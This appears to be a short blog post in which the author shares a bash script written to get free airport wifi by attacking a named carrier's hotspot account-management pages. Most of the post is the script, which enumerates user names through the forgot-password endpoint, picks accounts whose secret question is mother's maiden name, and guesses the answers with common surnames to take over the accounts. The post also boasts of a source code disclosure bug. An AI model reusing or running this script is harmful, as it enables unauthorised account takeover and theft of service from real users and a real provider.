A script I wrote today to get free wifi access while at the airport ;-) Enumerating user names and guessing password hints is pretty easy, no??? I also discovered a source code disclosure bug (screenshot above).
for f in m p l b e j r w;
do for l in smith johnson williams jones brown davis miller wilson moore taylor;
do echo "$f$l";
curl -s -b cookies.txt -c cookies.txt
'https://selfcare.hotspot.t-mobile.com/accountmanagement/ForgotPasswordInfo.do' -d "userName=$f$l" |
grep -A 1 'Secret Question' |
grep maiden &&
for name in smith johnson williams;
do echo $name;
curl -s -b cookies.txt -c cookies.txt
'https://selfcare.hotspot.t-mobile.com/accountmanagement/AnswerSecretQuestionInfo.do' -d "forgotSource=PASSWORD&answer=${name}&submit=Submit" |
html2text; done; done; done
0 comments:
Post a Comment